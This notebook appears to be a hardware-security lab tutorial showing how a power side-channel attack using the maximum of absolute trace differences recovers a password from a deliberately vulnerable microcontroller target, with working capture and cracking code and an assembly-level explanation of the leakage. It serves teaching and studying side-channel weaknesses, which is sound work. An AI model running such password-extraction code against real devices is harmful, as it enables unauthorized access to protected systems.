# Attack Password with ~~Timing Analysis~~ Difference Analysis III (MAD)

In [None]:
%run '../util/Metadata.ipynb'
print_metadata()

<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc"><ul class="toc-item"><li><span><a href="#Improving-the-code" data-toc-modified-id="Improving-the-code-1"><span class="toc-item-num">1&nbsp;&nbsp;</span>Improving the code</a></span></li><li><span><a href="#Basic-Setup" data-toc-modified-id="Basic-Setup-2"><span class="toc-item-num">2&nbsp;&nbsp;</span>Basic Setup</a></span></li><li><span><a href="#Helper-Functions-for-Password-Attack" data-toc-modified-id="Helper-Functions-for-Password-Attack-3"><span class="toc-item-num">3&nbsp;&nbsp;</span>Helper Functions for Password Attack</a></span></li><li><span><a href="#Try-the-old-Timing-Attack" data-toc-modified-id="Try-the-old-Timing-Attack-4"><span class="toc-item-num">4&nbsp;&nbsp;</span>Try the old Timing Attack</a></span></li><li><span><a href="#MAD-password-attack" data-toc-modified-id="MAD-password-attack-5"><span class="toc-item-num">5&nbsp;&nbsp;</span>MAD password attack</a></span></li><li><span><a href="#Find-good-base-characters" data-toc-modified-id="Find-good-base-characters-6"><span class="toc-item-num">6&nbsp;&nbsp;</span>Find good base characters</a></span></li><li><span><a href="#Analyze-all-possible-base-characters" data-toc-modified-id="Analyze-all-possible-base-characters-7"><span class="toc-item-num">7&nbsp;&nbsp;</span>Analyze <em>all</em> possible base characters</a></span></li><li><span><a href="#Why-different-base-characters-give-different-MADs" data-toc-modified-id="Why-different-base-characters-give-different-MADs-8"><span class="toc-item-num">8&nbsp;&nbsp;</span>Why different base characters give different MADs</a></span></li><li><span><a href="#Disconnect" data-toc-modified-id="Disconnect-9"><span class="toc-item-num">9&nbsp;&nbsp;</span>Disconnect</a></span></li></ul></div>

In this example, we want to improve `basic-passwdcheck` so that it resists the attack from the last tutorial.

## Improving the code

Let's first recap the password checking loop from `basic-passwdcheck`:
```c
for(uint8_t i = 0; i < sizeof(correct_passwd); i++){
    if (correct_passwd[i] != passwd[i]){
        passbad = 1;
        break;
    }
}
```

The timing attack discussed in the last example worked because the loop's runtime varies with the number of correct characters: the loop breaks as soon as the first wrong character occurs.
This is what we want to change:

```c
for(uint8_t i = 0; i < sizeof(correct_passwd); i++){
    if (correct_passwd[i] != passwd[i]){
        passbad = 1;
    }
}
```

This is an excerpt from `advanced-passwdcheck.c`. The loop no longer breaks after the first wrong character, so all characters of the password are always checked. In [Try the old Timing Attack](#Try-the-old-Timing-Attack) we can see that the old timing attack no longer works.
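To make the difference between the two loops concrete, here is a small Python model that counts loop iterations for both variants. It is only a sketch: the function names are hypothetical, the password `ifx2019` is taken from the default argument used later in this notebook, and we assume that bytes missing from a short guess count as mismatches (on the real target they would be whatever is left in the buffer).

```python
def early_exit_check(correct, guess):
    """Model of the basic-passwdcheck loop, which breaks on the first mismatch."""
    iterations = 0
    for i in range(len(correct)):
        iterations += 1
        # Assumption: bytes missing from the guess count as mismatches
        if i >= len(guess) or correct[i] != guess[i]:
            return 1, iterations  # passbad = 1; break
    return 0, iterations


def full_loop_check(correct, guess):
    """Model of the advanced-passwdcheck loop, which never breaks."""
    passbad = 0
    iterations = 0
    for i in range(len(correct)):
        iterations += 1
        if i >= len(guess) or correct[i] != guess[i]:
            passbad = 1
    return passbad, iterations


for guess in ['a', 'i', 'if', 'ifx2019']:
    print(guess, early_exit_check('ifx2019', guess), full_loop_check('ifx2019', guess))
```

The iteration count of the first model grows with the number of correct leading characters, which is exactly what the old timing attack exploited; the second model always runs all seven iterations.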

## Basic Setup

Define Variables

In [None]:
%run "../util/Init.ipynb"

Build target and upload

In [None]:
TARGET = 'advanced-passwdcheck'
%store TARGET
%run "$HELPERSCRIPTS/Prepare.ipynb"

Import helper functions

In [None]:
%run "$HELPERSCRIPTS/Setup_Generic.ipynb"

In [None]:
scope.adc.samples = 500

## Helper Functions for Password Attack

In [None]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool, Label

output_notebook()

In [None]:
import time  # time.sleep is used below while draining the serial buffer

def cap_pass_trace(pass_guess):
    reset_target(scope)
    scope.arm()
    target.flush()
    target.write(pass_guess)
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    
    ret = ''
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()
    
    return trace, ret

In [None]:
def sad(trace1, trace2):
    return sum(abs(trace1 - trace2))

## Try the old Timing Attack

Let's try again to see a difference in terms of SAD between a correct and a wrong character.

In [None]:
outputbuf = ""
trace1, _ = cap_pass_trace('a\n')
trace2, _ = cap_pass_trace('b\n')
trace3, _ = cap_pass_trace('i\n')
p = figure(height=200)
p.add_tools(CrosshairTool())
p.line(range(len(trace1)), abs(trace1 - trace2), color='blue',
       legend='abs(trace1 - trace2) with SAD = {:.2f}'.format(sad(trace1, trace2)))
p.line(range(len(trace1)), abs(trace1 - trace3), color='red', 
       legend='abs(trace1 - trace3) with SAD = {:.2f}'.format(sad(trace1, trace3)))
show(p)

If you run this cell a few times, you will see that both SADs are around 8-10 and that the difference between them is far too small to distinguish a correct character from a wrong one.

Have we found a "secure" solution that prevents an attacker from revealing the password?
The answer is simple: no. It's just a bit harder, and we only have to tweak the attack. You might notice a high peak at around position 70 in the plot above. This peak is much higher in the red plot than in the blue one.

We can use this peak to get the attack working again.

In [None]:
import numpy
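def cap_pass_trace_multiple(guess, repetitions):
    """Capture `repetitions` traces for the same guess; return their sum
    and the concatenated serial output."""
    traces = 0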
    output = ''
    for _ in range(repetitions):
        t, o = cap_pass_trace(guess)
        traces += t
        output += o
    return traces, output

By analogy with SAD (sum of absolute differences), we call this metric MAD: maximum of absolute differences.

In [None]:
def mad(trace1, trace2):
    return max(abs(trace1 - trace2))
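Why can MAD succeed where SAD fails? A synthetic example helps: the arrays below are made up for illustration, not captured traces. One difference is spread thinly over many samples, the other is concentrated in a single peak. Both have the same SAD, but MAD separates them clearly.

```python
import numpy as np

def sad(trace1, trace2):
    return np.sum(np.abs(trace1 - trace2))

def mad(trace1, trace2):
    return np.max(np.abs(trace1 - trace2))

base = np.zeros(100)
spread = base.copy()
spread[::10] = 0.1   # ten small differences of 0.1 each
peak = base.copy()
peak[70] = 1.0       # one large difference at a single sample

print(sad(base, spread), sad(base, peak))  # both about 1.0
print(mad(base, spread), mad(base, peak))  # 0.1 vs 1.0
```

Because the correct character only changes the trace in a few samples, summing over all samples lets the noise elsewhere swamp that change, while taking the maximum keeps it.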

If we record more than one trace per attempt and sum all traces recorded for the same attempt, the peak, and especially the difference between the peak heights, becomes significant:

In [None]:
outputbuf = ""
trace1, out1 = cap_pass_trace_multiple('\xf8\n', 2)
trace2, out2 = cap_pass_trace_multiple('a\n', 2)
trace3, out3 = cap_pass_trace_multiple('i\n', 2)

p = figure()
p.add_tools(CrosshairTool())
p.line(range(len(trace1)), abs(trace1 - trace2), color='blue',
       legend='abs(trace1 - trace2) with MAD = {:.2f}'.format(mad(trace1, trace2)))
p.line(range(len(trace1)), abs(trace1 - trace3), color='red', 
       legend='abs(trace1 - trace3) with MAD = {:.2f}'.format(mad(trace1, trace3)))
show(p)
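Summing helps because the data-dependent part of a trace adds up linearly with the number of captures, whereas independent random noise only grows with the square root of that number. The sketch below illustrates this on synthetic data. `synthetic_capture` is a hypothetical stand-in for `cap_pass_trace`, and the Gaussian noise model and the peak height are assumptions, not measurements.

```python
import numpy as np

rng = np.random.default_rng(0)
NOISE_STD = 0.05  # assumed per-capture noise level

def synthetic_capture(n_samples=5000, peak_at=70, peak_height=0.05):
    """Hypothetical stand-in for cap_pass_trace(): a small peak plus Gaussian noise."""
    trace = rng.normal(0.0, NOISE_STD, n_samples)
    trace[peak_at] += peak_height
    return trace

def summed_capture(repetitions):
    """Same idea as cap_pass_trace_multiple(): add up several captures."""
    return sum(synthetic_capture() for _ in range(repetitions))

for n in (1, 4, 16):
    trace = summed_capture(n)
    noise = np.std(np.delete(trace, 70))  # noise level away from the peak
    print(n, 'expected peak', n * 0.05, 'noise std', round(noise, 3))
```

With 16 captures the peak grows sixteenfold while the noise only grows about fourfold, so the signal-to-noise ratio improves by roughly a factor of four.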

Now we can program an automated version of the password cracker again:

## MAD password attack

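1. Capture a trace for the known password prefix followed by a base character that is certainly wrong. Let's call this `base_trace`.
2. Capture traces for the prefix followed by each candidate character and calculate the MAD between each of them and `base_trace`. A candidate whose MAD exceeds a threshold is the correct next character.
3. Append the character found to the prefix and start again from step 1.

This is very similar to the SAD attack, except that we use a different distinguishing criterion and that every time we say 'capture a trace' we mean 'capture a few traces and sum them up'.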

In [None]:
def mad_attack(
    check_level=0.1,
    base_char='\xf8',
    trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'
):
    password = ''
    outputbuf = ''

    while 'Welcome' not in outputbuf:
        # Capture base_trace with a next character that is certainly wrong
        base_trace, _ = cap_pass_trace_multiple(password + base_char + '\n', 2)

        for c in trylist:
            # Try character
            trace, outputbuf = cap_pass_trace_multiple(password + c + '\n', 2)
            # Check if c is correct
            if mad(base_trace, trace) > check_level:
                print("Success: " + c)
                password += c
                break

    print('Successfully broken password: ' + password)
    return password

mad_attack()
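If you want to experiment with the attack loop without hardware, here is a sketch that runs the same three steps against a simulated target. Everything about the simulated target is an assumption: `simulated_trace` is a hypothetical leakage model with two samples per password position, one proportional to the Hamming weight of the loaded guess byte (`ld r25, Z+`) and one that is high whenever `ldi r24, 0x01` executes, i.e. whenever the guessed byte is wrong. The check `found != password` stands in for looking for `Welcome` in the serial output.

```python
import numpy as np

def hamming_weight(byte):
    return bin(byte).count('1')

def simulated_trace(guess, password, rng, noise_std=0.002):
    """Hypothetical leakage model of the advanced-passwdcheck loop (not real data)."""
    guess_bytes = guess.encode('latin-1')
    samples = []
    for i, correct in enumerate(password.encode('latin-1')):
        g = guess_bytes[i] if i < len(guess_bytes) else 0
        samples.append(0.005 * hamming_weight(g))      # ld r25, Z+
        samples.append(1.0 if g != correct else 0.0)   # ldi r24, 0x01 runs on mismatch
    trace = np.array(samples)
    return trace + rng.normal(0.0, noise_std, trace.size)

def mad(trace1, trace2):
    return np.max(np.abs(trace1 - trace2))

def simulated_mad_attack(password, base_char='\xf8', check_level=0.1,
                         trylist='abcdefghijklmnopqrstuvwxyz0123456789',
                         repetitions=2, seed=0):
    rng = np.random.default_rng(seed)

    def capture(guess):
        # Sum several noisy captures, like cap_pass_trace_multiple()
        return sum(simulated_trace(guess, password, rng) for _ in range(repetitions))

    found = ''
    while found != password:  # stands in for the 'Welcome' check
        base_trace = capture(found + base_char)
        for c in trylist:
            if mad(base_trace, capture(found + c)) > check_level:
                found += c
                break
        else:
            # Unlike the loop above, give up instead of retrying forever
            raise RuntimeError('no character exceeded check_level')
    return found

print(simulated_mad_attack('ifx2019'))
```

The `for ... else` branch is a design choice for the simulation: on real hardware, retrying the same prefix (as `mad_attack` does) can make sense because noise may hide the peak once, but in a model with a fixed threshold a failed pass means the threshold is wrong.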

---
We have not yet explained why `\xf8` is a good base character. Answering this question requires a more detailed analysis:

## Find good base characters

First we define a function to print out and analyze the *quality* of a single base character.

In [None]:
import tqdm
import pandas

def test_base_char(base_char):
    trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'
    stats = []
    base_trace, _ = cap_pass_trace_multiple(base_char + '\n', 2)
    for c in tqdm.tqdm_notebook(trylist):
        stats.append((
            '{:02x}'.format(ord(base_char)) if base_char else '', 
            c, 
            mad(base_trace, cap_pass_trace_multiple(c + '\n', 2)[0])
        ))
    df = pandas.DataFrame(stats, columns=['base_char', 'char', 'mad'])
    df = df.sort_values(by='mad', ascending=False)
    return df

stats = test_base_char('\xf8')
stats

This can also be shown nicely in a plot:

In [None]:
import bokeh.palettes
import bokeh.transform
import bokeh.models

df = stats.copy().sort_values('char')

colormap = bokeh.transform.linear_cmap(
    field_name='mad', 
    palette=bokeh.palettes.Oranges6, 
    low=max(df['mad']),
    high=min(df['mad'])
)

p = figure(x_range=df['char'])
p.add_tools(CrosshairTool())
p.vbar(x='char', top='mad', source=df, width=0.5, color=colormap)
show(p)

## Analyze *all* possible base characters

In [None]:
import tqdm
import pandas as pd

def analyse_all_base_chars(
    base_list=list(map(chr, range(1, 256))), 
    trylist='abcdefghijklmnopqrstuvwxyz0123456789',
    filename='mad_chars_stats.dat',
    password='ifx2019',
):
    stats = []
    for pass_len in tqdm.tqdm_notebook(range(len(password))):
        for base_char in tqdm.tqdm_notebook(base_list):
            base_trace, _ = cap_pass_trace_multiple(password[:pass_len] + base_char + '\n', 2)
            for c in tqdm.tqdm_notebook(trylist):
                stats.append((
                    password[pass_len], 
                    '{:02x}'.format(ord(base_char)), 
                    c, 
                    mad(base_trace, cap_pass_trace_multiple(password[:pass_len] + c + '\n', 2)[0])
                ))

    stats = pd.DataFrame(stats, columns=['pass_char', 'base_char', 'char', 'mad'])
    stats.to_pickle(filename)

# Commented out because it takes around 4 hours to run
# analyse_all_base_chars()
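Where do the roughly 4 hours come from? A quick count of the captures performed by `analyse_all_base_chars()` with its default arguments gives an idea. The time per capture printed at the end is only what the "around 4h" figure implies; it is not a measured value.

```python
# Rough capture count for analyse_all_base_chars() with its default arguments
password_len = len('ifx2019')           # 7 password positions
n_base_chars = len(range(1, 256))       # 255 base characters
n_trials = len('abcdefghijklmnopqrstuvwxyz0123456789')  # 36 guesses
repetitions = 2                         # cap_pass_trace_multiple(..., 2)

# One base trace plus one trace per trial character, for every base char and position
n_captures = password_len * n_base_chars * (1 + n_trials) * repetitions
seconds_per_capture = 4 * 3600 / n_captures  # implied by "around 4 hours"
print(n_captures, round(seconds_per_capture, 3))
```

That is 132,090 captures, or roughly 0.1 s each, so shrinking `base_list` or `trylist` is the most direct way to shorten the run.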

In [None]:
import pandas as pd
mad_chars_stats = pd.read_pickle('mad_chars_stats.dat')
mad_chars_stats

In [None]:
import bokeh.io
import bokeh.palettes
from bokeh.models import LinearColorMapper

df = mad_chars_stats.copy()
df['disp'] = df['pass_char'] + '-' + df['char']

colormap = LinearColorMapper(
    palette=bokeh.palettes.PuRd5,
    low=min(df.query('char == pass_char').groupby('pass_char').max()['mad']),
    high=min(df['mad']),
)

p = figure(
    x_range=df['base_char'].unique(),
    y_range=df['disp'].unique(),
    plot_height=600,
    sizing_mode='stretch_both',
)

p.rect(x='base_char', y='disp', source=df, width=1, height=1, 
       fill_color={'field': 'mad', 'transform': colormap},
       line_color=None)

# Reset output to display the graph purely in a new tab
# bokeh.io.reset_output()

show(p)
bokeh.io.output_notebook()

What can we see in the heatmap above?
* Dark rectangles represent a high MAD value.
* Light rectangles represent a low MAD value.
* We can see all the correct characters.
* "Good" columns are those without many dark rectangles.
* The "best" base character is the column in which the highest MAD of a wrong guess lies furthest below the lowest MAD of a correct character.

The "best" base character can be also found programmatically:

In [None]:
import numpy
import pandas

df = mad_chars_stats
stats = []
for base_char in df['base_char'].unique():
    df_base_char = df[df['base_char'] == base_char]
    min_pass_char_mad = min(df_base_char.query('pass_char == char')['mad'])
    max_guess_char_mad = max(df_base_char.query('pass_char != char')['mad'])
    stats.append((base_char, min_pass_char_mad, max_guess_char_mad, min_pass_char_mad - max_guess_char_mad))

df = pandas.DataFrame(stats, columns=['base_char', 'min_pass_char_mad', 'max_guess_char_mad', 'diffdiff'])
df = df.sort_values(by=['diffdiff'], ascending=False)
df

And indeed, we found that `\xf8` is the best base character to crack the password!
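The loop above can also be written in vectorised form with `groupby`. The sketch below runs it on a tiny table of made-up MAD values for two base characters (illustrative numbers, not measurements) with the same column names as `mad_chars_stats`, so the criterion "lowest correct MAD minus highest wrong MAD" is easy to check by hand.

```python
import pandas as pd

# Made-up MAD values for two base characters (not measurements)
toy = pd.DataFrame({
    'pass_char': ['i', 'i', 'i', 'i', 'f', 'f', 'f', 'f'],
    'base_char': ['f8', 'f8', '00', '00', 'f8', 'f8', '00', '00'],
    'char':      ['i', 'a', 'i', 'a', 'f', 'a', 'f', 'a'],
    'mad':       [2.0, 0.05, 1.5, 0.6, 1.8, 0.04, 1.2, 0.7],
})

is_correct = toy['pass_char'] == toy['char']
min_correct = toy[is_correct].groupby('base_char')['mad'].min()
max_wrong = toy[~is_correct].groupby('base_char')['mad'].max()

# Larger margin = safer threshold between correct and wrong guesses
margin = (min_correct - max_wrong).sort_values(ascending=False)
print(margin)
```

For `f8` the margin is 1.8 - 0.05 = 1.75, for `00` it is 1.2 - 0.7 = 0.5, so `f8` ranks first.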

## Why different base characters give different MADs

We have seen that not all base characters give equal results, but we have not yet discussed why the MAD differs so much between base characters.

Let's start by comparing two different base characters:

In [None]:
outputbuf = ""
trace1, _ = cap_pass_trace_multiple('\x00\n', 2)
trace2, _ = cap_pass_trace_multiple('\xff\n', 2)
trace3, _ = cap_pass_trace_multiple('i\n', 2)
trace4, _ = cap_pass_trace_multiple('a\n', 2)

data = [
    (abs(trace1 - trace3), '\\x00 <-> i'),
    (abs(trace1 - trace2), '\\x00 <-> \\xff'),
    (abs(trace2 - trace3), '\\xff <-> i'),
    (abs(trace4 - trace3), 'a <-> i'),
]
colors = bokeh.palettes.Set1_8

p = figure(x_range=(0, 100), height=400, sizing_mode='stretch_width')
p.add_tools(CrosshairTool())
for (trace, legend), color in zip(data, colors):
    p.line(range(len(trace)), trace, color=color, legend=legend)
show(p)

Since the ADC clock source `scope.clock.adc_src` is set to `clkgen_x4` by default, we record 4 samples per target CPU cycle. We can also see this in the figure above by measuring the distance between two neighbouring peaks. So there are three instructions that generate a large difference. Why?
To understand this, we have to look at the assembly of the password comparison loop:

```
    ldi  r24, 0x00   ; passbad = 0
loop:
    ld   r20, X+     ; correct_chr = *correct_passwd; correct_passwd++;
    ld   r25, Z+     ; chr = *passwd; passwd++;
    cpse r20, r25    ; if (correct_chr == chr) skip next instruction;
    ldi  r24, 0x01   ; passbad = 1;
```
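To relate the assembly to the plot, we can map each instruction to the sample where its peak should appear. This sketch takes the observed spacing of 4 samples between neighbouring peaks and the position x = 53 of the `ld r25, Z+` peak from the discussion of the plot; it assumes one peak per listed instruction, and `instruction_sample_positions` is a hypothetical helper. The same arithmetic is used for the annotations in the last plot of this notebook.

```python
SAMPLES_PER_CYCLE = 4  # adc_src = 'clkgen_x4'

def instruction_sample_positions(anchor_sample, anchor_index, n_instructions):
    """Expected sample index of each instruction, assuming evenly spaced peaks."""
    return [anchor_sample + SAMPLES_PER_CYCLE * (i - anchor_index)
            for i in range(n_instructions)]

loop_body = ['ld r20, X+', 'ld r25, Z+', 'cpse r20, r25', 'ldi r24, 0x01']
# Anchor: the `ld r25, Z+` peak (index 1 in loop_body) at sample 53
for name, x in zip(loop_body, instruction_sample_positions(53, 1, len(loop_body))):
    print(f'{name:15s} -> sample {x}')
```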

__`ld r20, X+`__ <br/>
Loading the correct character is identical in every attempt, so this does not generate much difference.

__`ld r25, Z+`__ <br/>
Loading the guessed character can generate a difference. As we already know, the power consumption of a microcontroller roughly follows the Hamming weight of the data it processes. Thus, if the character `\xff` (Hamming weight 8) is loaded during this instruction, the power consumption differs considerably from loading `\x00` (Hamming weight 0).
Comparing `\x00` with `i` (Hamming weight 4), on the other hand, gives a smaller difference.
This is exactly what we see in the different heights of the blue, green and red lines at x = 53.
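The Hamming weights quoted above are easy to verify. The sketch below computes them and, under a simple Hamming-weight leakage model (an assumption that ignores everything except the loaded byte), the expected relative difference at `ld r25, Z+` for each pair of traces in the plot.

```python
def hamming_weight(ch):
    """Number of set bits in the byte value of a single character."""
    return bin(ord(ch)).count('1')

for ch in ['\x00', '\xff', 'i', 'a', '\xf8']:
    print(repr(ch), hex(ord(ch)), hamming_weight(ch))

# Under a Hamming-weight model, the difference at `ld r25, Z+`
# scales with the difference of the two Hamming weights
pairs = [('\x00', 'i'), ('\x00', '\xff'), ('\xff', 'i'), ('a', 'i')]
for a, b in pairs:
    print(repr(a), '<->', repr(b), abs(hamming_weight(a) - hamming_weight(b)))
```

The model predicts a difference of 8 for `\x00 <-> \xff` (blue) and 4 for both `\x00 <-> i` (red) and `\xff <-> i` (green), matching the ordering of the peak heights described above.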

__`cpse r20, r25`__ <br/>
The comparison itself is harder to analyze. Its power consumption depends on the Hamming weights of both operands, on the preceding operations, and on the result of the comparison. Accordingly, the comparison of `\xff` with `i` looks very different from the comparison of `i` with `i` (the green line). The smallest difference in the plot above is produced by the red line, which contrasts the comparison of `\x00` with `i` against that of `i` with `i`.

__`ldi r24, 0x01`__ <br/>
`cpse` skips this instruction only when both characters are equal, so it is skipped in `trace3` (where the guess `i` is correct) and executed in all other traces. Hence every line that involves `trace3` shows a peak of nearly equal height here. The only line that does not involve `trace3` is the blue one, and it shows no peak at this instruction because the instruction is executed in both of its traces.
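The skip behaviour can be summarised in a few lines. This sketch models only `cpse r20, r25` and the following `ldi r24, 0x01`; the cycle counts are taken from the AVR instruction set manual (`cpse` needs 1 cycle without a skip and 2 cycles when it skips a one-word instruction, `ldi` needs 1 cycle). It shows that the number of cycles is the same for correct and wrong guesses, so there is no timing leak, but *which* instruction runs in the second cycle differs, and that is what the peak reveals.

```python
# Cycle counts from the AVR instruction set manual
CPSE_NO_SKIP = 1        # operands differ, nothing is skipped
CPSE_SKIP_ONE_WORD = 2  # operands equal, a one-word instruction is skipped
LDI = 1

def ldi_executed(correct_chr, guess_chr):
    """`cpse` skips the following `ldi r24, 0x01` only when both bytes are equal."""
    return correct_chr != guess_chr

def compare_cycles(correct_chr, guess_chr):
    """Cycles spent in `cpse r20, r25` plus the possibly skipped `ldi`."""
    if ldi_executed(correct_chr, guess_chr):
        return CPSE_NO_SKIP + LDI
    return CPSE_SKIP_ONE_WORD

correct = 'i'
pairs = [('\x00', 'i'), ('\x00', '\xff'), ('\xff', 'i'), ('a', 'i')]
for g1, g2 in pairs:
    same = ldi_executed(correct, g1) == ldi_executed(correct, g2)
    print(repr(g1), '<->', repr(g2),
          'ldi: same' if same else 'ldi: differs',
          compare_cycles(correct, g1), compare_cycles(correct, g2))
```

Only the `\x00 <-> \xff` pair executes `ldi` in both traces, which matches the missing peak in the blue line.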

Finally, we can annotate the plot with the instruction that belongs to each peak:

In [None]:
import numpy
from bokeh.models import Span, Label, BoxAnnotation
import bokeh.palettes

# Record traces
trace1, _ = cap_pass_trace_multiple('\x00\n', 2)
trace2, _ = cap_pass_trace_multiple('\xff\n', 2)
trace3, _ = cap_pass_trace_multiple('i\n', 2)
trace4, _ = cap_pass_trace_multiple('a\n', 2)

data = [
    (abs(trace1 - trace3), '\\x00 <-> i'),
    (abs(trace1 - trace2), '\\x00 <-> \\xff'),
    (abs(trace2 - trace3), '\\xff <-> i'),
    (abs(trace4 - trace3), 'a <-> i'),
]
colors = bokeh.palettes.Set1_8

p = figure(height=400, x_range=(45, 65), sizing_mode='stretch_width')
p.add_tools(CrosshairTool())

# Plot annotations
indexmaxblue = numpy.argmax(abs(trace1 - trace2))
annotations = [indexmaxblue + 4 * i for i in range(-1, 3)]

for x, text in zip(annotations, ['ld r20, X+', 'ld r25, Z+', 'cpse r20, r25', 'ldi r24, 0x01']):
    p.add_layout(Span(location=x, dimension='height', line_color='darkslateblue', line_width=20, line_alpha=0.1))
    p.add_layout(Label(x=x, y=p.plot_height, text=text, y_units='screen', x_offset=-15, y_offset=-50,
                       text_align='right', text_color='darkslateblue'))
    for (trace, _), color in zip(data, colors):
        p.circle(x, trace[x], size=10, color=color)

# Plot differences
for (trace, legend), color in zip(data, colors):
    p.line(range(len(trace)), trace, color=color, legend=legend)

show(p)

## Disconnect

In [None]:
scope.dis()
target.dis()